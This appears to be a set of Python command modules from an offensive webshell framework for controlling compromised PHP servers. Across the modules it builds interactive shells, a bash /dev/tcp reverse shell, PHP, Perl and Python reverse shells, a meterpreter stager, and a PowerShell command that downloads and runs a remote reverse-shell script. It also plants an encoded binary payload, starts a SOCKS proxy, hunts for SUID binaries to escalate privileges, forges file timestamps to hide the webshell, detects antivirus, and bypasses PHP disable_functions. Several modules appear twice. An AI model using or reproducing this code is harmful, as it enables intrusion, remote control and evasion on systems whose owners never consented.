def run(*commands): """ shell Get a temporary shell of target system by system function or just run a shell command. """ command = str(value_translation(gget("raw_command_args"))) if (command): res = send(get_system_code(command)) if (not res): return print(color.green("\nResult:\n\n") + res.r_text.strip() + "\n") return print( color.cyan( "Eenter interactive temporary shell...\n\nUse 'back' command to return doughnuts.\n" )) res = send( f'{get_system_code("whoami")}print("@".$_SERVER["SERVER_NAME"]."|".getcwd());' ).r_text.strip() prompt, pwd = res.split("|") set_namespace("webshell", False, True) wordlist = gget("webshell.wordlist") readline.set_wordlist(NEW_WINDOWS_WORDLIST if ( is_windows()) else NEW_UNIX_WORDLIST) if is_windows(): prompt = "%s> " else: prompt = prompt.replace("\r", "").replace("\n", "") + ":%s$ " try: while gget("loop"): print(prompt % pwd, end="") command = str(value_translation(readline())) lower_command = command.lower() if (lower_command.lower() in ['exit', 'quit', 'back']): print() break if (command == ''): print() continue b64_pwd = base64_encode(pwd) if (lower_command.startswith("cd ") and len(lower_command) > 3): path = base64_encode(lower_command[3:].strip()) res = send( f'chdir(base64_decode(\'{b64_pwd}\'));chdir(base64_decode(\'{path}\'));print(getcwd());' ) if (not res): return pwd = res.r_text.strip() else: res = send(f'chdir(base64_decode(\'{b64_pwd}\'));' + get_system_code(command)) if (not res): return print("\n" + res.r_text.strip() + "\n") finally: readline.set_wordlist(wordlist)
def run(find_path: str = "/usr&/bin"): """ av (Only for windows) Detect anti-virus software running on the target system. ps: Need to run system commands Origin: https://github.com/BrownFly/findAV, https://github.com/gh0stkey/avList """ if (not is_windows()): print(color.red("\nTarget system isn't windows\n")) return res = send(get_system_code("tasklist /svc")) if (not res or not res.r_text or "No system execute function" in res.r_text): print(color.red("\nDetect error\n")) return with open(path.join(gget("root_path"), "auxiliary", "av", "av.json"), "r", encoding="utf-8") as f: av_processes = loads(f.read()) flag = 0 print("\n" + color.green(" " * 37 + "Result")) for line in res.r_text.split("\n"): process = line.split(' ')[0] if process in av_processes: flag = 1 print(" %40s - %-30s" % (color.cyan(process), color.yellow(av_processes[process]))) if (not flag): print(" %40s / %-30s" % (color.green('No anti-virus'), color.red('Not found'))) print()
def get_bash_cmd(ip: str, port: int): bash = f"""bash -c '0<&159-;exec 159<>/dev/tcp/{ip}/{int(port)};sh <&159 >&159 2>&159' """ php = get_system_code(bash) t = Thread(target=send, args=(php, )) t.setDaemon(True) t.start() return t
def run(lhost: str, port: int, mode: int = 0, fakename: str = "/usr/lib/systemd"): """ reshell Bind a local port and wait for target connect back to get a full shell. eg: reshell {lhost} {port} {type=[python|upload]{1|2},default = 0 (Python:1 Not Python:2)} {(Only for Mode 2) fakename=/usr/lib/systemd} """ if (is_windows(False) or is_windows()): print(color.red(f"Only for both system is linux.")) return False try: port = int(port) except ValueError: port = 23333 disable_func_list = gget("webshell.disable_functions", "webshell") MODE = 1 print(color.yellow(f"Waring: You are using a testing command....")) print(color.yellow(f" Please make sure Port {port} open....")) if (mode == 0): if (has_env("python")): print(color.green(f"Traget has python environment.")) MODE == 1 else: print(color.red(f"Traget has not python environment.")) MODE == 2 else: MODE = int(mode) if ("proc_open" in disable_func_list): print(color.red("proc_open is disabled... Try Mode 3")) return if (MODE == 1): print(color.yellow(f"Use Mode 1->python")) command = get_php(lhost, port) else: print(color.yellow(f"Use Mode 2->upload")) filename = encrypt(f"{lhost}-{port}") if not upload( path.join(gget("root_path"), "auxiliary", "reshell", "reverse_server_x86_64"), "/tmp/%s" % filename, True): return command = get_system_code( f"cd /tmp && chmod +x {filename} && ./{filename} {fakename}", False) t = Thread(target=delay_send, args=(2, command)) t.setDaemon(True) t.start() print(f"Bind port {color.yellow(str(port))}...") if (not bind(port, MODE)): print(color.red(f"Bind port error.")) if (MODE == 3): res = send(f"unlink('/tmp/{filename}');") if (not res): return
def run(): """ checkvm Simply check whether the machine is a virtual machine. """ if (is_windows()): commands = (get_system_code( 'Systeminfo | findstr /i "System Model"', True)) else: commands = (get_system_code(each, True) for each in ( "dmidecode -s system-product-name", "lshw -class system", "dmesg | grep -i virtual", "lscpu")) for command in commands: result = send(command).r_text if (any(vm in result for vm in type_vm)): print(f"\nis VM: {color.green('True')}\n") else: print(f"\nis VM: {color.red('False')}\n")
def run(port: int = 8888): """ socks (Only for *unix) Run a socks5 server on the target system by python. eg: socks {port=8888} """ if (is_windows()): print(color.red("Target system isn't *unix")) return flag = has_env("python") if flag: python = get_python(port) pyname = "check.py" res = send( f"print(file_put_contents('/tmp/{pyname}', base64_decode(\"{base64_encode(python)}\")));" ) if (not res): return text = res.r_text.strip() if not len(text): print(color.red("Failed to write file in /tmp directory.")) return t = Thread(target=send, args=(get_system_code(f"python /tmp/{pyname}"), )) t.setDaemon(True) t.start() t2 = Thread(target=delay_send, args=( 10.0, f"unlink('/tmp/{pyname}');", )) t2.setDaemon(True) t2.start() sleep(1) if (t.isAlive()): print( f"\nStart socks5 server listen on {port} {color.green('success')}.\n" ) else: print(f"\nStart socks5 server {color.red('error')}.\n") else: print( color.red( "The target host does not exist or cannot be found in the python environment." ))
def run(find_path: str = "/usr&/bin"): """ priv (Only for *unix) Find all files with suid belonging to root and try to get privilege escalation tips. ps:use & to split find_path eg: priv {find_path="/usr&/bin"} """ if (is_windows()): print(color.red("\nTarget system isn't *unix\n")) return print( color.yellow( f"\nFinding all files with suid belonging to root in {find_path}...\n" )) phpcode = "" priv_tips = {} if ("&" in find_path): find_paths = find_path.split("&") else: find_paths = (find_path, ) for each in find_paths: phpcode += get_system_code( f"find {each} -user root -perm -4000 -type f 2>/dev/null") res = send(phpcode) if (not res): return suid_commands = res.r_text.strip().split("\n") if (not suid_commands or "No system execute function" in suid_commands[0]): print(color.red("\nFind error\n")) return with open(path.join(gget("root_path"), "auxiliary", "priv", "gtfo.json"), "r") as f: priv_tips = loads(f.read()) for cmd_path in suid_commands: cmd = cmd_path.split("/")[-1] if (cmd in priv_tips): print( color.yellow(cmd_path) + f" ( https://gtfobins.github.io/gtfobins/{cmd}/ )\n") for k, v in priv_tips[cmd].items(): info = '\n'.join(v) print(f"""{color.cyan(k)}\n{color.green(info)}\n""")
def run(filename: str = ""): """ touch Create an empty file or (Only for *unix) Specify a file whose modification time stamp is the same as a random file in the current directory. eg: touch {filename=this_webshell} """ command = get_system_code("touch -r $reference $file", False) res = send(get_php(filename, command)) if (not res): return text = res.r_text.strip() if (match(r"\d+", text)): print(color.green(f"\nSuccessfully created an empty file {filename}.\n")) elif ("No system execute function!" in text): print(color.red("\nall the system execute commands are disabled.\n")) else: print(color.green(f"\nModify time stamp {text} success.\n"))
def run(filename: str = ""): """ touch (Only for *unix) Specify a file whose modification time stamp is the same as a random file in the current directory. eg: touch {filename=this_webshell} """ if (is_windows()): print(color.red("Target system is windows.")) return try: command = get_system_code("touch -r $reference $file", False) res = send(get_php(filename, command)) if (not res): return reference = res.r_text.strip() print(color.green(f"Modify time stamp {reference} success.")) except IndexError: print(color.red("all the system execute commands are disabled."))
def get_python_meterpreter(ip: str, port: int): python = """import socket,zlib,base64,struct,time for x in range(10): try: s=socket.socket(2,socket.SOCK_STREAM) s.connect(('""" + ip + """',""" + str(port) + """)) break except: time.sleep(5) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)<l: d+=s.recv(l-len(d)) exec(zlib.decompress(base64.b64decode(d)),{'s':s}) """ execgo = f"""exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('{b64encode(python.encode("utf-8")).decode("utf-8")}')[0]))""" php = get_system_code(f'python -c "{execgo}"') t = Thread(target=send, args=(php, )) t.setDaemon(True) t.start() return t
def get_reverse_php(ip: str, port: str, upload_path: str): if (is_windows()): filename = f"{upload_path}\\\\services.exe" return """header('Content-type: text/plain'); $payload = "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"; $evalCode = gzinflate(base64_decode($payload)); file_put_contents("%s", $evalCode); %s""" % (filename, get_system_code(f"{filename} {ip} {port}", False)) else: return """ignore_user_abort(true); ini_set("max_execution_time",0); $ipaddr = "%s"; $port = "%s"; $descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w")); $cwd = getcwd(); $msg = php_uname()."\\nTemporary shall\\n"; $type = True; if(!in_array('proc_open', explode(',', ini_get('disable_functions')))){ $sock = fsockopen($ipaddr, $port); $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); $process = proc_open('/bin/sh', $descriptorspec, $pipes); proc_close($process); die(); } else{ $env = array("path" => "/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin"); } if(function_exists("fsockopen")) { $sock = fsockopen($ipaddr,$port); } else { $sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); socket_connect($sock,$ipaddr,$port); socket_write($sock,$msg); $type = False; } fwrite($sock,$msg); fwrite($sock,"[".getcwd()."]$ "); while (True) { if ($type == True){ $cmd = fread($sock,1024); } else { $cmd = socket_read($sock,1024); } if (substr($cmd,0,3) == "cd " and strlen($cmd) > 3) { $cwd = trim(substr($cmd,3)); chdir($cwd); $cwd = getcwd(); } else if (trim(strtolower($cmd)) == "exit") { break; } else { $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env); if (is_resource($process)) { fwrite($pipes[0],$cmd); fclose($pipes[0]); $msg = stream_get_contents($pipes[1]); if ($type == True){ fwrite($sock,$msg); } else { socket_write($sock,$msg,strlen($msg)); } fclose($pipes[1]); $msg = stream_get_contents($pipes[2]); if ($type == True){ fwrite($sock,$msg); } else { socket_write($sock,$msg,strlen($msg)); } fclose($pipes[2]); proc_close($process); } } fwrite($sock,"[".getcwd()."]$ "); } if ($type == True){ fclose($sock); } else {socket_close($sock); }""" % (ip, port)
def run(ip: str, port: str, reverse_type: str = "php"): """ reverse reverse shell to a host from target system. eg: reverse {ip} {port} {type=php} reverse_type: - bash - php - python - powershell(ps) - perl (only for *unix) """ reverse_type = str(reverse_type).lower() upload_tmp_dir = gget("webshell.upload_tmp_dir", "webshell") if reverse_type == "bash": if (is_windows()): print(color.red("Target system is windows")) return command = f"""bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'""" t = Thread(target=send, args=(get_system_code(command),)) t.setDaemon(True) t.start() elif reverse_type == "php": php = get_reverse_php(ip, port, upload_tmp_dir) t = Thread(target=send, args=(php,)) t.setDaemon(True) t.start() if (is_windows()): t2 = Thread(target=delay_send, args=( 10.0, f"unlink('{upload_tmp_dir}\\\\services.exe');",)) t2.setDaemon(True) t2.start() elif reverse_type in ("powershell", "ps"): command = '''IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress %s -port %s''' % (ip, port) command = f"powershell -nop -ep bypass -encodedcommand {base64_encode(command, encoding='utf-16le')}" t = Thread(target=send, args=(get_system_code(command),)) t.setDaemon(True) t.start() elif reverse_type == "perl": if (is_windows()): print(color.red("Target system is windows")) return command = """perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" % ( ip, port) t = Thread(target=send, args=(get_system_code(command),)) t.setDaemon(True) t.start() elif reverse_type == "python": if has_env("python"): t = Thread(target=send, args=(get_system_code(get_reverse_python(ip, port), False),)) t.setDaemon(True) t.start() else: print( color.red( "The target host does not exist or cannot be found in the python environment." ) ) return else: print(color.red("Reverse type Error.")) return sleep(1) if (t.isAlive()): print(f"\nReverse shell to {ip}:{port} {color.green('success')}.\n") else: print(f"\nReverse shell {color.red('error')}.\n")
def run(mode: str = '0'): """ bdf Try to bypass disable_functions by php7-backtrace-bypass. Mode -1 / Mode close: Close bdf Mode auto: Automatically filter and test all bdf modes Mode 0: Display the current bdf mode Mode 1 php7-backtrace(Only for php7.0-7.4 and *unix) : Origin: - https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass Targets: - 7.0 - all versions to date - 7.1 - all versions to date - 7.2 - all versions to date - 7.3 < 7.3.15 (released 20 Feb 2020) - 7.4 < 7.4.3 (released 20 Feb 2020) Mode 2 php7-gc(Only for php7.0-7.3 and *unix) : Origin: - https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass Targets: - 7.0 - all versions to date - 7.1 - all versions to date - 7.2 - all versions to date - 7.3 - all versions to date Mode 3 php7-json(Only for php7.1-7.3): Origin: - https://github.com/mm0r1/exploits/tree/master/php-json-bypass Targets: - 7.1 - all versions to date - 7.2 < 7.2.19 (released 30 May 2019) - 7.3 < 7.3.6 (released 30 May 2019) Mode 4 LD_PRELOAD(Only for *unix): Need: - putenv, mail/error_log/mb_send_mail/imap_email fucntions enabled Mode 5 FFI(Only for *unix and php >= 7.4): Author: - MorouU Need: - FFI extension Mode 6 COM(Only for windows): Need: - com_dotnet extension Mode 7 imap_open: Need: - imap extension """ if (mode == "close"): mode = -1 if (mode == "auto"): test_list = windows_test_list if is_windows() else linux_test_list php_version = gget("webshell.php_version", "webshell") if (not php_version.startswith("7.")): test_list -= {1, 2, 3} for test_mode in test_list: print(f"Try Mode {test_mode} {mode_to_desc_dict[test_mode]}:") if (set_mode(test_mode, True)): res = send( get_system_code("echo 6ac2ed344113c07c0028327388553273", mode=test_mode)) if (res and "6ac2ed344113c07c0028327388553273" in res.r_text): print(color.green("\n Success\n")) print( f"Set bypass disable_functions: {test_mode}-{mode_to_desc_dict[test_mode]}\n" ) gset("webshell.bypass_df", test_mode, True, "webshell") break else: print(color.red("\n Failed!\n")) continue else: try: mode = int(mode) except ValueError: print(color.red("\nMode error.\n")) return if (mode == 0): print( f"\nbypass disable_functions: {mode_to_desc_dict[gget('webshell.bypass_df', 'webshell')]}\n" ) elif (mode in mode_to_desc_dict and (mode not in mode_linux_set or not is_windows())): set_mode(mode) pass else: print(color.red("\nMode error.\n"))
def run(ip: str, port: str, reverse_type: str = "php"): """ reverse reverse shell to a host from target system. eg: reverse {ip} {port} {type=php} """ reverse_type = str(reverse_type).lower() if reverse_type == "php": php = get_reverse_php(ip, port) t = Thread(target=send, args=(php, )) t.setDaemon(True) t.start() elif reverse_type == "python": if has_env("python"): python = get_reverse_python(ip, port) if is_windows(): pyname = "python-update.py" upload_tmp_dir = gget("webshell.upload_tmp_dir", "webshell") res = send( f"print(file_put_contents('{upload_tmp_dir}{pyname}', \"{python}\"));" ) if (not res): return text = res.r_text.strip() if not len(text): print( color.red( f"Failed to write file in {upload_tmp_dir if upload_tmp_dir else 'current'} directory." )) return t = Thread(target=send, args=(get_system_code( f"python {upload_tmp_dir}{pyname}", False), )) t.setDaemon(True) t.start() t2 = Thread(target=delay_send, args=( 10.0, f"unlink('{upload_tmp_dir}{pyname}');", )) t2.setDaemon(True) t2.start() else: t = Thread(target=send, args=(get_system_code(python, False), )) t.setDaemon(True) t.start() else: print( color.red( "The target host does not exist or cannot be found in the python environment." )) return else: print(color.red("Reverse type Error.")) return sleep(1) if (t.isAlive()): print(f"\nReverse shell to {ip}:{port} {color.green('success')}.\n") else: print(f"\nReverse shell {color.red('error')}.\n")
def run(mode: str = '0'): """ bdf Try to bypass disable_functions by php7-backtrace-bypass. Mode -1 / Mode close: Close bdf Mode auto: Automatically filter and test all bdf modes Mode 0: Display the current bdf mode Mode 1 php7-backtrace(Only for php7.0-7.4 and *unix) : Origin: - https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass Targets: - 7.0 - all versions to date - 7.1 - all versions to date - 7.2 - all versions to date - 7.3 < 7.3.15 (released 20 Feb 2020) - 7.4 < 7.4.3 (released 20 Feb 2020) Mode 2 php7-gc(Only for php7.0-7.3 and *unix) : Origin: - https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass Targets: - 7.0 - all versions to date - 7.1 - all versions to date - 7.2 - all versions to date - 7.3 - all versions to date Mode 3 php7-json(Only for php7.1-7.3): Origin: - https://github.com/mm0r1/exploits/tree/master/php-json-bypass Targets: - 7.1 - all versions to date - 7.2 < 7.2.19 (released 30 May 2019) - 7.3 < 7.3.6 (released 30 May 2019) Mode 4 LD_PRELOAD(Only for *unix): Need: - putenv, mail/error_log/mb_send_mail/imap_email fucntions Mode 5 FFI(Only for *unix and php >= 7.4): Author: - MorouU Need: - FFI extension Mode 6 COM(Only for windows): Need: - com_dotnet extension Mode 7 imap_open: Need: - imap extension Mode 8 MYSQL-UDF: Need: - db_init - mysql >= 5.1 Mode 9 php7-splDoublyLinkedList: Origin: - https://www.freebuf.com/vuls/251017.html Targets: - 7.1 - all versions to date - 7.2 - all versions to date - 7.3 - all versions to date - 7.4 < 7.4.11 Mode 10 php-fpm Origin: - https://xz.aliyun.com/t/5598 Need: - php-fpm - gopher: curl extension, fpm can access by http - sock: stream_socket_client function, fpm can access by sock - http_sock: fsockopen / pfsockopen function, fpm can access by http Mode 11 apache-mod-cgi Origin: - https://github.com/l3m0n/Bypass_Disable_functions_Shell/blob/master/exp/apache_mod_cgi/exp.php Need: - apache_mod_cgi - allow .htaccess Mode 12 iconv Origin: - https://xz.aliyun.com/t/8669 Need: - iconv extension - putenv fucntions """ if (mode == "close"): mode = -1 if (mode == "auto"): test_list = windows_test_list if is_windows() else linux_test_list php_version = gget("webshell.php_version", "webshell") if (not php_version.startswith("7.")): test_list -= {1, 2, 3, 9} if (not gget("db_connected", "webshell") or gget("db_dbms", "webshell") != "mysql"): test_list -= {8} for test_mode in test_list: print(f"Try Mode {test_mode} {mode_to_desc_dict[test_mode]}:") if (set_mode(test_mode, True)): res = send( get_system_code("echo 6ac2ed344113c07c0028327388553273", mode=test_mode)) if (res and "6ac2ed344113c07c0028327388553273" in res.r_text): print(color.green("\n Success\n")) print( f"Set bypass disable_functions: {test_mode}-{mode_to_desc_dict[test_mode]}\n" ) gset("webshell.bypass_df", test_mode, True, "webshell") break else: print(color.red("\n Failed!\n")) continue else: try: mode = int(mode) except ValueError: print(color.red("\nMode error\n")) return if (mode == 0): print( f"\nbypass disable_functions: {mode_to_desc_dict[gget('webshell.bypass_df', 'webshell')]}\n" ) elif (mode in mode_to_desc_dict and (mode not in mode_linux_set or not is_windows())): set_mode(mode) pass else: print(color.red("\nMode error\n"))